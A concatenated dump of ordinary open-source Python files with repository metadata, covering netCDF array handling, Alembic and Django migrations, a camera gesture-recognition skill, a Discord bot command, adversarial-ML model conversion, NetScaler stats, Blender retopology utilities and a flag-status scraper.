#class var_from_netCDF(np.ndarray):
#""" class to store data from netCDF file with attributes """
#def __init__(self,ncvar,indices=None):
#if indices is None:
#self = ncvar[:]
#else:
#self = ncvar[indices]
#self.dims = ncvar.dimensions
#for att in self.ncattrs():
#setattr(self,att,ncvar.getncattr(att))
class ndplusArray(np.ndarray):
""" subclass of ndarray for taking netCDF variables with variable attributes
see https://docs.scipy.org/doc/numpy/user/basics.subclassing.html """
def __new__(cls,ncvar,indices=None):
if indices is None:
indices = tuple([slice(0,ind) for ind in ncvar.shape])
if isinstance(ncvar[indices],np.ma.masked_array):
data = ncvar[indices].astype(float).filled(np.nan)
else:
data = ncvar[indices]
obj = np.asarray(data).view(cls)
attrs = {key:ncvar.getncattr(key) for key in ncvar.ncattrs()}
obj.ncattrs = attrs
for key,val in attrs.items():
setattr(obj,key,val)
return obj
def __array_finalize__(self,obj):
if obj is None: return
self.ncattrs = getattr(obj,"ncattrs",None)
| 37.648649
| 90
| 0.570711
|
bf2ffade5340ea9139f48c7a5cca2fb7aa149ab2
| 1,131
|
py
|
Python
|
python/twicorder/web/migrations/versions/2b7189e2db00_users_table.py
|
thimic/twicorder
|
f3ae11501f5e9fa6b7eecefcf2a652e99c711bc0
|
[
"MIT"
] | 2
|
2020-01-22T23:22:50.000Z
|
2020-02-02T05:56:08.000Z
|
python/twicorder/web/migrations/versions/2b7189e2db00_users_table.py
|
thimic/twicorder
|
f3ae11501f5e9fa6b7eecefcf2a652e99c711bc0
|
[
"MIT"
] | 1
|
2018-03-28T19:53:11.000Z
|
2018-03-28T19:53:11.000Z
|
python/twicorder/web/migrations/versions/2b7189e2db00_users_table.py
|
thimic/twicorder
|
f3ae11501f5e9fa6b7eecefcf2a652e99c711bc0
|
[
"MIT"
] | null | null | null |
"""users table
Revision ID: 2b7189e2db00
Revises:
Create Date: 2020-07-29 22:46:06.005235
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '2b7189e2db00'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('user',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('username', sa.String(length=64), nullable=True),
sa.Column('email', sa.String(length=120), nullable=True),
sa.Column('password_hash', sa.String(length=128), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_user_email'), 'user', ['email'], unique=True)
op.create_index(op.f('ix_user_username'), 'user', ['username'], unique=True)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_user_username'), table_name='user')
op.drop_index(op.f('ix_user_email'), table_name='user')
op.drop_table('user')
# ### end Alembic commands ###
| 29
| 80
| 0.678161
|
a490d02cf6d5ea29e82cfc273c4d7115d1a767b2
| 2,495
|
py
|
Python
|
official_examples/技能模板/Static_Gesture_Recognition_Template/index.py
|
huaweicloud/HiLens-Lab
|
2b0613db2a40ec86c267bc69076e9fb7987fc610
|
[
"Apache-2.0"
] | 31
|
2020-01-09T11:11:35.000Z
|
2022-02-25T06:19:19.000Z
|
official_examples/技能模板/Static_Gesture_Recognition_Template/index.py
|
huaweicloud/HiLens-Lab
|
2b0613db2a40ec86c267bc69076e9fb7987fc610
|
[
"Apache-2.0"
] | null | null | null |
official_examples/技能模板/Static_Gesture_Recognition_Template/index.py
|
huaweicloud/HiLens-Lab
|
2b0613db2a40ec86c267bc69076e9fb7987fc610
|
[
"Apache-2.0"
] | 12
|
2020-01-09T16:00:32.000Z
|
2021-05-24T07:33:08.000Z
|
#! /usr/bin/python3.7
import os
import cv2
import time
import numpy as np
import hilens
from utils import *
def run():
# 配置系统日志级别
hilens.set_log_level(hilens.ERROR)
# 系统初始化,参数要与创建技能时填写的检验值保持一致
hilens.init("gesture")
# 初始化模型
gesture_model_path = hilens.get_model_dir() + "gesture_template_model.om"
gesture_model = hilens.Model(gesture_model_path)
# 初始化本地摄像头与HDMI显示器
camera = hilens.VideoCapture()
display_hdmi = hilens.Display(hilens.HDMI)
# 上一次上传OBS图片的时间与上传间隔
last_upload_time = 0
upload_duration = 5
# 读取技能配置
skill_cfg = hilens.get_skill_config()
if skill_cfg is None or 'server_url' not in skill_cfg:
hilens.error("server_url not configured")
return
while True:
# 读取一帧图片(YUV NV21格式)
input_yuv = camera.read()
# 图片预处理:转为RGB格式、缩放为模型输入尺寸
img_rgb = cv2.cvtColor(input_yuv, cv2.COLOR_YUV2RGB_NV21)
img_preprocess, img_w, img_h = preprocess(img_rgb)
# 模型推理
output = gesture_model.infer([img_preprocess.flatten()])
# 后处理得到手势所在区域与类别,并在RGB图中画框
bboxes = get_result(output, img_w, img_h)
img_rgb = draw_boxes(img_rgb, bboxes)
# 输出处理后的图像到HDMI显示器,必须先转回YUV NV21格式
output_yuv = hilens.cvt_color(img_rgb, hilens.RGB2YUV_NV21)
display_hdmi.show(output_yuv)
# 上传OK手势图片到OBS,为防止OBS数据存储过多,间隔一定的时间才上传图片
if time.time() - last_upload_time > upload_duration:
# 截取出OK手势图片(如果有的话)
img_OK = get_OK(img_rgb, bboxes)
if img_OK is not None:
# 上传OK手势图片到OBS,图片(用当前时间命名)需要先转为BGR格式并按照jpg格式编码
img_OK = cv2.cvtColor(img_OK, cv2.COLOR_RGB2BGR)
img_OK = cv2.imencode('.jpg', img_OK)[1]
filename = time.strftime("%Y_%m_%d_%H_%M_%S", time.localtime())
ret = hilens.upload_bufer(filename+"_OK.jpg", img_OK, "write")
if ret != 0:
hilens.error("upload pic failed!")
return
last_upload_time = time.time()
# 以POST方式传输处理后的整张图片
try:
post_msg(skill_cfg['server_url'], img_rgb)
except Exception as e:
hilens.error("post data failed!")
print ("Reason : ", e)
hilens.terminate()
if __name__ == "__main__":
run()
| 30.426829
| 83
| 0.581964
|
7c954dd76f1e7dd230ee298de2cb2597f8953fb3
| 2,297
|
py
|
Python
|
commands/textchannels.py
|
nstra111/autovc
|
e73e1fea7b566721c3dce3ca6f587472e7ee9d1b
|
[
"MIT"
] | 177
|
2020-02-02T18:03:46.000Z
|
2022-03-17T06:18:43.000Z
|
commands/textchannels.py
|
zigsphere/Auto-Voice-Channels
|
6ae901728580bef4246737a6f1b9f10763badd3e
|
[
"MIT"
] | 82
|
2020-02-02T17:43:18.000Z
|
2022-03-24T20:34:55.000Z
|
commands/textchannels.py
|
zigsphere/Auto-Voice-Channels
|
6ae901728580bef4246737a6f1b9f10763badd3e
|
[
"MIT"
] | 165
|
2019-02-17T20:15:20.000Z
|
2022-03-27T23:59:23.000Z
|
import utils
from commands.base import Cmd
help_text = [
[
("Usage:", "<PREFIX><COMMAND>"),
("Description:",
"Toggle whether or not to create temporary private text channels for each voice chat, "
"for people to spam links, music bot commands, `/tts` commands, or for people without mics to type in. "
"These channels are only visible to members of each voice chat and get deleted once everyone leaves.\n\n"
"Admins of the server will be able to see **all** text channels, "
"which may look a bit ugly if you have a lot of active channels, but fear not, "
"regular members will only see the one channel assigned to their voice chat.\n\n"
"To set the channel name for all future text channels, use the `textchannelname` command.\n\n"
"**OFF** by default."),
("Note",
"As an admin it may be tricky to discern which text channel is yours, since you can see all of them and "
"they all have the same name. Simply look at the user list on the right when selecting the channel - the "
"one with the same members as the voice you're in is the one for you.\n"
"You can safely rename your specific channel to make it easier to find again, "
"but do not change the channel topic as this is used to find and delete the channel in some cases."),
]
]
async def execute(ctx, params):
guild = ctx['guild']
settings = ctx['settings']
textchannels = not settings['text_channels'] if 'text_channels' in settings else True
settings['text_channels'] = textchannels
utils.set_serv_settings(guild, settings)
if textchannels:
r = "OK, from now on I'll create private text channels for each voice chat."
perms = guild.me.permissions_in(ctx['channel'])
if not perms.manage_roles:
r += ("\n:warning: Make sure I have the **Manage Roles** permission in this server and any categories that "
"contain my voice channels, otherwise I won't be able to make the text channels.")
else:
r = "Text channel creation is now **OFF** :)"
return True, r
command = Cmd(
execute=execute,
help_text=help_text,
params_required=0,
gold_required=True,
admin_required=True,
)
| 45.94
| 120
| 0.659556
|
18dc623b229c2191726ab19bd983ac1a353f200a
| 2,819
|
py
|
Python
|
cleverhans/utils_pytorch.py
|
industrysc/cleverhans
|
5ff7e42fc5379ba7dc9972f3dc85930e49b7f729
|
[
"MIT"
] | 10
|
2017-06-09T00:54:11.000Z
|
2021-07-07T14:44:02.000Z
|
cleverhans/utils_pytorch.py
|
industrysc/cleverhans
|
5ff7e42fc5379ba7dc9972f3dc85930e49b7f729
|
[
"MIT"
] | 1
|
2018-11-18T17:33:42.000Z
|
2018-11-18T17:33:42.000Z
|
cleverhans/utils_pytorch.py
|
industrysc/cleverhans
|
5ff7e42fc5379ba7dc9972f3dc85930e49b7f729
|
[
"MIT"
] | 7
|
2017-06-06T17:18:29.000Z
|
2021-02-15T11:40:46.000Z
|
"""Basic utilities for pytorch code"""
from random import getrandbits
import tensorflow as tf
import torch
from torch.autograd import Variable
# https://gist.github.com/kingspp/3ec7d9958c13b94310c1a365759aa3f4
# Pyfunc Gradient Function
def _py_func_with_gradient(func, inp, Tout, stateful=True, name=None,
grad_func=None):
"""
PyFunc defined as given by Tensorflow
:param func: Custom Function
:param inp: Function Inputs
:param Tout: Ouput Type of out Custom Function
:param stateful: Calculate Gradients when stateful is True
:param name: Name of the PyFunction
:param grad: Custom Gradient Function
:return:
"""
# Generate random name in order to avoid conflicts with inbuilt names
rnd_name = 'PyFuncGrad-' + '%0x' % getrandbits(30 * 4)
# Register Tensorflow Gradient
tf.RegisterGradient(rnd_name)(grad_func)
# Get current graph
g = tf.get_default_graph()
# Add gradient override map
with g.gradient_override_map({"PyFunc": rnd_name,
"PyFuncStateless": rnd_name}):
return tf.py_func(func, inp, Tout, stateful=stateful, name=name)
def convert_pytorch_model_to_tf(model, out_dims=None):
"""
Convert a pytorch model into a tensorflow op that allows backprop
:param model: A pytorch nn.Model object
:param out_dims: The number of output dimensions (classes) for the model
:return: A model function that maps an input (tf.Tensor) to the
output of the model (tf.Tensor)
"""
torch_state = {
'logits': None,
'x': None,
}
if not out_dims:
out_dims = list(model.modules())[-1].out_features
def _fprop_fn(x_np):
"""TODO: write this"""
x_tensor = torch.Tensor(x_np)
if torch.cuda.is_available():
x_tensor = x_tensor.cuda()
torch_state['x'] = Variable(x_tensor, requires_grad=True)
torch_state['logits'] = model(torch_state['x'])
return torch_state['logits'].data.cpu().numpy()
def _bprop_fn(x_np, grads_in_np):
"""TODO: write this"""
_fprop_fn(x_np)
grads_in_tensor = torch.Tensor(grads_in_np)
if torch.cuda.is_available():
grads_in_tensor = grads_in_tensor.cuda()
# Run our backprop through our logits to our xs
loss = torch.sum(torch_state['logits'] * grads_in_tensor)
loss.backward()
return torch_state['x'].grad.cpu().data.numpy()
def _tf_gradient_fn(op, grads_in):
"""TODO: write this"""
return tf.py_func(_bprop_fn, [op.inputs[0], grads_in],
Tout=[tf.float32])
def tf_model_fn(x_op):
"""TODO: write this"""
out = _py_func_with_gradient(_fprop_fn, [x_op], Tout=[tf.float32],
stateful=True,
grad_func=_tf_gradient_fn)[0]
out.set_shape([None, out_dims])
return out
return tf_model_fn
| 31.674157
| 74
| 0.674353
|
67563af8924b9179c2eff923c1b0a2dcae7fa3b0
| 5,550
|
py
|
Python
|
nssrc/com/citrix/netscaler/nitro/resource/stat/ns/nslimitidentifier_stats.py
|
guardicore/nitro-python
|
5346a5086134aead80968f15a41ff527adaa0ec1
|
[
"Apache-2.0"
] | null | null | null |
nssrc/com/citrix/netscaler/nitro/resource/stat/ns/nslimitidentifier_stats.py
|
guardicore/nitro-python
|
5346a5086134aead80968f15a41ff527adaa0ec1
|
[
"Apache-2.0"
] | null | null | null |
nssrc/com/citrix/netscaler/nitro/resource/stat/ns/nslimitidentifier_stats.py
|
guardicore/nitro-python
|
5346a5086134aead80968f15a41ff527adaa0ec1
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright (c) 2021 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class nslimitidentifier_stats(base_resource) :
r""" Statistics for limit Indetifier resource.
"""
def __init__(self) :
self._name = None
self._pattern = None
self._clearstats = None
self._sortby = None
self._sortorder = None
self._ratelmtobjhits = 0
self._ratelmtobjdrops = 0
self._ratelmtsessionobjhits = 0
@property
def name(self) :
r"""The name of the identifier.<br/>Minimum length = 1.
"""
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
r"""The name of the identifier.
"""
try :
self._name = name
except Exception as e:
raise e
@property
def pattern(self) :
r"""Pattern for the selector field, ? means field is required, * means field value does not matter, anything else is a regular pattern.
"""
try :
return self._pattern
except Exception as e:
raise e
@pattern.setter
def pattern(self, pattern) :
r"""Pattern for the selector field, ? means field is required, * means field value does not matter, anything else is a regular pattern
"""
try :
self._pattern = pattern
except Exception as e:
raise e
@property
def clearstats(self) :
r"""Clear the statsistics / counters.<br/>Possible values = basic, full.
"""
try :
return self._clearstats
except Exception as e:
raise e
@clearstats.setter
def clearstats(self, clearstats) :
r"""Clear the statsistics / counters
"""
try :
self._clearstats = clearstats
except Exception as e:
raise e
@property
def sortby(self) :
r"""use this argument to sort by specific key.<br/>Possible values = .
"""
try :
return self._sortby
except Exception as e:
raise e
@sortby.setter
def sortby(self, sortby) :
r"""use this argument to sort by specific key
"""
try :
self._sortby = sortby
except Exception as e:
raise e
@property
def sortorder(self) :
r"""use this argument to specify sort order.<br/>Default value: SORT_DESCENDING<br/>Possible values = ascending, descending.
"""
try :
return self._sortorder
except Exception as e:
raise e
@sortorder.setter
def sortorder(self, sortorder) :
r"""use this argument to specify sort order
"""
try :
self._sortorder = sortorder
except Exception as e:
raise e
@property
def ratelmtobjhits(self) :
r"""Total hits.
"""
try :
return self._ratelmtobjhits
except Exception as e:
raise e
@property
def ratelmtsessionobjhits(self) :
r"""Total hits.
"""
try :
return self._ratelmtsessionobjhits
except Exception as e:
raise e
@property
def ratelmtobjdrops(self) :
r"""Total drops.
"""
try :
return self._ratelmtobjdrops
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
r""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(nslimitidentifier_response, response, self.__class__.__name__.replace('_stats',''))
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.nslimitidentifier
except Exception as e :
raise e
def _get_object_name(self) :
r""" Returns the value of object identifier argument
"""
try :
if self.name is not None :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def get(cls, service, name="", option_="") :
r""" Use this API to fetch the statistics of all nslimitidentifier_stats resources that are configured on netscaler.
set statbindings=True in options to retrieve bindings.
"""
try :
obj = nslimitidentifier_stats()
if not name :
response = obj.stat_resources(service, option_)
else :
obj.name = name
response = obj.stat_resource(service, option_)
return response
except Exception as e:
raise e
class Clearstats:
basic = "basic"
full = "full"
class Sortorder:
ascending = "ascending"
descending = "descending"
class nslimitidentifier_response(base_response) :
def __init__(self, length=1) :
self.nslimitidentifier = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.nslimitidentifier = [nslimitidentifier_stats() for _ in range(length)]
| 25.694444
| 140
| 0.708829
|
09eabdd060d5be264e5f10529d38b3c7a7a92ca6
| 831
|
py
|
Python
|
src/api/modules/tumblr_manager.py
|
jelly-ape/dts_server
|
e770e7fc5b960f551f6008f70388ab63e98f876b
|
[
"MIT"
] | null | null | null |
src/api/modules/tumblr_manager.py
|
jelly-ape/dts_server
|
e770e7fc5b960f551f6008f70388ab63e98f876b
|
[
"MIT"
] | null | null | null |
src/api/modules/tumblr_manager.py
|
jelly-ape/dts_server
|
e770e7fc5b960f551f6008f70388ab63e98f876b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
import pymongo
import os
try:
import ujson as json
except ImportError:
import json
import api.libs.utils
@api.libs.utils.singleton
class TumblrManager(object):
def __init__(self):
self._photos = self.__load()
def __load(self):
photos = []
photo_file = os.path.join(
os.path.abspath(os.path.dirname(__file__)),
'../../../data',
'some',
)
with open(photo_file) as f:
for line in f:
line = line.strip()
js = json.loads(line)
photos.append(js)
return photos
def get(self, **kwargs):
skip = int(kwargs.get('skip', 0))
limit = int(kwargs.get('max', 20))
return self._photos[skip: skip + limit]
| 21.868421
| 55
| 0.540313
|
d69f0df8984a73c116e5f517cee5a519e104a123
| 2,859
|
py
|
Python
|
flagstatus.py
|
FlyBoy8869/flagstatus
|
fae205aa63957ab926f1164f845755f08a446d9c
|
[
"MIT"
] | null | null | null |
flagstatus.py
|
FlyBoy8869/flagstatus
|
fae205aa63957ab926f1164f845755f08a446d9c
|
[
"MIT"
] | null | null | null |
flagstatus.py
|
FlyBoy8869/flagstatus
|
fae205aa63957ab926f1164f845755f08a446d9c
|
[
"MIT"
] | null | null | null |
from datetime import date
from enum import Enum
from tkinter import *
from tkinter import ttk
import requests
from PIL import Image, ImageTk
from tkinter_helpers import center
URL = "https://www.nh.gov/index.htm"
MARKER_1 = "icon-flag"
MARKER_2 = "full"
HTML_COMMENT_START = "<!--"
HTML_COMMENT_END = "-->"
# date format e.g., Sunday, January 01, 2022
DATE_FORMAT = '%A, %B %d, %Y'
class Status(Enum):
FULLMAST = 1
HALFMAST = 2
UNDETERMINED = 3
status_context = {
Status.FULLMAST: ("resources/images/flag_full.png", " - Full Mast"),
Status.HALFMAST: ("resources/images/flag_half.png", " - Half Mast"),
Status.UNDETERMINED: ("resources/images/undetermined.png", " - Unable to determine"),
}
def _get_page(url: str) -> str:
""""Return the webpage text of 'url' if successful, or else an empty string"""
try:
request = requests.get(url)
except requests.exceptions.ConnectionError:
return ""
return request.text
def _is_comment_start(line: str):
return line.lstrip().startswith(HTML_COMMENT_START)
def _is_comment_end(line: str):
return line.rstrip().endswith(HTML_COMMENT_END)
def _is_single_line_comment(line: str):
return _is_comment_start(line) and _is_comment_end(line)
def _is_start_multiline_comment(line: str):
return _is_comment_start(line) and not _is_comment_end(line)
def _skip_html_comments(text):
def _skip_intervening_comment_lines():
while not _is_comment_end(next(document)):
continue
next(document) # position iterator at line right after the closing comment line
# explicitly create iterator as it will be manually manipulated
document = iter(text.split("\r\n"))
for line in document:
if not line.strip():
continue
if _is_single_line_comment(line):
continue # allows skipping consecutive comment lines
if _is_start_multiline_comment(line):
_skip_intervening_comment_lines()
continue
yield line
def _find_status_line(text: str) -> str:
for line in _skip_html_comments(text):
if MARKER_1 in line:
return line
return ""
def get_status() -> Status:
status_line = _find_status_line(_get_page(URL))
if not status_line:
return Status.UNDETERMINED
if MARKER_2 in status_line:
return Status.FULLMAST
return Status.HALFMAST
def main():
status = get_status()
root = Tk()
window_title = f"Flag Status for {date.today().strftime(DATE_FORMAT)}"
file_name, title_suffix = status_context[status]
status_image = ImageTk.PhotoImage(Image.open(file_name))
label = ttk.Label(root, image=status_image)
root.title("".join([window_title, title_suffix]))
label.pack()
center(root)
root.mainloop()
if __name__ == '__main__':
main()
| 24.86087
| 89
| 0.685904
|
bd49d2245a2a07d39902fe19ce72d64f5516831f
| 6,627
|
py
|
Python
|
scripts/addons/RetopoFlow/retopoflow/rftool_strokes/strokes_utils.py
|
Tilapiatsu/blender-custom_conf
|
05592fedf74e4b7075a6228b8448a5cda10f7753
|
[
"MIT"
] | 1,600
|
2015-03-19T12:26:15.000Z
|
2022-03-30T21:07:37.000Z
|
retopoflow/rftool_strokes/strokes_utils.py
|
Varelshen/retopoflow
|
5e9fd7ff65e7a5a64bf3078c78fb71cc270fdb71
|
[
"OML"
] | 1,026
|
2015-03-18T22:17:42.000Z
|
2022-03-28T17:47:04.000Z
|
retopoflow/rftool_strokes/strokes_utils.py
|
Varelshen/retopoflow
|
5e9fd7ff65e7a5a64bf3078c78fb71cc270fdb71
|
[
"OML"
] | 241
|
2015-03-19T13:44:36.000Z
|
2022-03-30T21:07:39.000Z
|
'''
Copyright (C) 2021 CG Cookie
http://cgcookie.com
hello@cgcookie.com
Created by Jonathan Denning, Jonathan Williamson
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import bgl
import bpy
import math
from mathutils import Vector, Matrix
from mathutils.geometry import intersect_line_line_2d
from ...addon_common.common.debug import dprint
from ...addon_common.common.maths import Point,Point2D,Vec2D,Vec, Normal, clamp
from ...addon_common.common.bezier import CubicBezierSpline, CubicBezier
from ...addon_common.common.utils import iter_pairs
def process_stroke_filter(stroke, min_distance=1.0, max_distance=2.0):
''' filter stroke to pts that are at least min_distance apart '''
nstroke = stroke[:1]
for p in stroke[1:]:
v = p - nstroke[-1]
l = v.length
if l < min_distance: continue
d = v / l
while l > 0:
q = nstroke[-1] + d * min(l, max_distance)
nstroke.append(q)
l -= max_distance
return nstroke
def process_stroke_source(stroke, raycast, Point_to_Point2D=None, is_point_on_mirrored_side=None, mirror_point=None, clamp_point_to_symmetry=None):
''' filter out pts that don't hit source on non-mirrored side '''
pts = [(pt, raycast(pt)[0]) for pt in stroke]
pts = [(pt, p3d) for (pt, p3d) in pts if p3d]
if Point_to_Point2D and mirror_point:
pts_ = [Point_to_Point2D(mirror_point(p3d)) for (_, p3d) in pts]
pts = [(pt, raycast(pt)[0]) for pt in pts_]
pts = [(pt, p3d) for (pt, p3d) in pts if p3d]
if Point_to_Point2D and clamp_point_to_symmetry:
pts_ = [Point_to_Point2D(clamp_point_to_symmetry(p3d)) for (_, p3d) in pts]
pts = [(pt, raycast(pt)[0]) for pt in pts_]
pts = [(pt, p3d) for (pt, p3d) in pts if p3d]
if is_point_on_mirrored_side:
pts = [(pt, p3d) for (pt, p3d) in pts if not is_point_on_mirrored_side(p3d)]
return [pt for (pt, _) in pts]
def find_edge_cycles(edges):
edges = set(edges)
verts = {v: set() for e in edges for v in e.verts}
for e in edges:
for v in e.verts:
verts[v].add(e)
in_cycle = set()
for vstart in verts:
if vstart in in_cycle: continue
for estart in vstart.link_edges:
if estart not in edges: continue
if estart in in_cycle: continue
q = [(estart, vstart, None)]
found = None
trace = {}
while q:
ec, vc, ep = q.pop(0)
if ec in trace: continue
trace[ec] = (vc, ep)
vn = ec.other_vert(vc)
if vn == vstart:
found = ec
break
q += [(en, vn, ec) for en in vn.link_edges if en in edges]
if not found: continue
l = [found]
in_cycle.add(found)
while True:
vn, ep = trace[l[-1]]
in_cycle.add(vn)
in_cycle.add(ep)
if vn == vstart: break
l.append(ep)
yield l
def find_edge_strips(edges):
''' find edge strips '''
edges = set(edges)
verts = {v: set() for e in edges for v in e.verts}
for e in edges:
for v in e.verts:
verts[v].add(e)
ends = [v for v in verts if len(verts[v]) == 1]
def get_edge_sequence(v0, v1):
trace = {}
q = [(None, v0)]
while q:
vf,vt = q.pop(0)
if vt in trace: continue
trace[vt] = vf
if vt == v1: break
for e in verts[vt]:
q.append((vt, e.other_vert(vt)))
if v1 not in trace: return []
l = []
while v1 is not None:
l.append(v1)
v1 = trace[v1]
l.reverse()
return [v0.shared_edge(v1) for (v0, v1) in iter_pairs(l, wrap=False)]
for i0 in range(len(ends)):
for i1 in range(i0+1,len(ends)):
l = get_edge_sequence(ends[i0], ends[i1])
if l: yield l
def get_strip_verts(edge_strip):
l = len(edge_strip)
if l == 0: return []
if l == 1:
e = edge_strip[0]
return list(e.verts) if e.is_valid else []
vs = []
for e0, e1 in iter_pairs(edge_strip, wrap=False):
vs.append(e0.shared_vert(e1))
vs = [edge_strip[0].other_vert(vs[0])] + vs + [edge_strip[-1].other_vert(vs[-1])]
return vs
def restroke(stroke, percentages):
lens = [(s0 - s1).length for (s0, s1) in iter_pairs(stroke, wrap=False)]
total_len = sum(lens)
stops = [max(0, min(1, p)) * total_len for p in percentages]
dist = 0
istroke = 0
istop = 0
nstroke = []
while istroke + 1 < len(stroke) and istop < len(stops):
if lens[istroke] <= 0:
istroke += 1
continue
t = (stops[istop] - dist) / lens[istroke]
if t < 0:
istop += 1
elif t > 1.000001:
dist += lens[istroke]
istroke += 1
else:
s0, s1 = stroke[istroke], stroke[istroke + 1]
nstroke.append(s0 + (s1 - s0) * t)
istop += 1
return nstroke
def walk_to_corner(from_vert, to_edges):
to_verts = {v for e in to_edges for v in e.verts}
edges = [
(e, from_vert, None)
for e in from_vert.link_edges
if not e.is_manifold and e.is_valid
]
touched = {}
found = None
while edges:
ec, v0, ep = edges.pop(0)
if ec in touched: continue
touched[ec] = (v0, ep)
v1 = ec.other_vert(v0)
if v1 in to_verts:
found = ec
break
nedges = [
(en, v1, ec)
for en in v1.link_edges
if en != ec and not en.is_manifold and en.is_valid
]
edges += nedges
if not found: return None
# walk back
walk = [found]
while True:
ec = walk[-1]
v0, ep = touched[ec]
if v0 == from_vert:
break
walk.append(ep)
return walk
| 33.469697
| 147
| 0.56813
|
a6c4773c55a956ac11906f5904ca5a702b588514
| 621
|
py
|
Python
|
Eso.API.Discovery/integration/execution_queue_handler.py
|
afgbeveridge/EsotericLanguagesToolkit
|
05f391f5c03c9fc7dd60f7f4ef89e480315dc1bc
|
[
"MIT"
] | 1
|
2021-07-14T23:39:19.000Z
|
2021-07-14T23:39:19.000Z
|
Eso.API.Discovery/integration/execution_queue_handler.py
|
afgbeveridge/EsotericLanguagesToolkit
|
05f391f5c03c9fc7dd60f7f4ef89e480315dc1bc
|
[
"MIT"
] | null | null | null |
Eso.API.Discovery/integration/execution_queue_handler.py
|
afgbeveridge/EsotericLanguagesToolkit
|
05f391f5c03c9fc7dd60f7f4ef89e480315dc1bc
|
[
"MIT"
] | null | null | null |
import json
from json.decoder import JSONDecodeError
import datetime
import io
from constants import *
from repos.language_repository import LanguageRepository
from integration.abstract_queue_handler import AbstractQueueHandler
class ExecutionQueueHandler(AbstractQueueHandler):
def __init__(self, nature):
super().__init__(nature)
def must_exist(self):
return True
def process(self, payload, definition):
definition[EXECUTION_LAST] = datetime.datetime.now()
cnt = definition[EXECUTION_COUNT]
definition[EXECUTION_COUNT] = int(cnt) + 1 if cnt is not None else 1
| 27
| 76
| 0.753623
|
22fc9c5473a1f92e49cec12d524d0bf526b73f24
| 1,200
|
py
|
Python
|
yellow_club_project/yellow_site/migrations/0003_auto_20200629_0721.py
|
yellow-club/yellow_site
|
03999920d43877cbc54788aa2821d0c39b3c591e
|
[
"MIT"
] | null | null | null |
yellow_club_project/yellow_site/migrations/0003_auto_20200629_0721.py
|
yellow-club/yellow_site
|
03999920d43877cbc54788aa2821d0c39b3c591e
|
[
"MIT"
] | 2
|
2020-06-28T11:18:12.000Z
|
2020-06-30T12:58:21.000Z
|
yellow_club_project/yellow_site/migrations/0003_auto_20200629_0721.py
|
yellow-club/yellow_site
|
03999920d43877cbc54788aa2821d0c39b3c591e
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.7 on 2020-06-29 07:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('yellow_site', '0002_auto_20200627_1450'),
]
operations = [
migrations.AlterModelOptions(
name='post',
options={'ordering': ['-created_at'], 'verbose_name': 'Статья', 'verbose_name_plural': 'Статьи'},
),
migrations.RemoveField(
model_name='post',
name='event_date',
),
migrations.RemoveField(
model_name='post',
name='event_number',
),
migrations.RemoveField(
model_name='post',
name='speaker',
),
migrations.AddField(
model_name='post',
name='author',
field=models.CharField(default='', max_length=100, verbose_name='Автор'),
preserve_default=False,
),
migrations.AddField(
model_name='post',
name='updated_at',
field=models.DateTimeField(auto_now_add=True, default='2020-06-29', verbose_name='Обновлено'),
preserve_default=False,
),
]
| 28.571429
| 109
| 0.5575
|
6340e9418a4530f0736dfbf3f441c5afdf8f3247
| 1,586
|
py
|
Python
|
test/azure/Expected/AcceptanceTests/AzureParameterGrouping/azureparametergrouping/models/parameter_grouping_post_required_parameters_py3.py
|
iscai-msft/autorest.python
|
a9f38dd762fbc046ce6197bfabea2f56045d2957
|
[
"MIT"
] | null | null | null |
test/azure/Expected/AcceptanceTests/AzureParameterGrouping/azureparametergrouping/models/parameter_grouping_post_required_parameters_py3.py
|
iscai-msft/autorest.python
|
a9f38dd762fbc046ce6197bfabea2f56045d2957
|
[
"MIT"
] | null | null | null |
test/azure/Expected/AcceptanceTests/AzureParameterGrouping/azureparametergrouping/models/parameter_grouping_post_required_parameters_py3.py
|
iscai-msft/autorest.python
|
a9f38dd762fbc046ce6197bfabea2f56045d2957
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
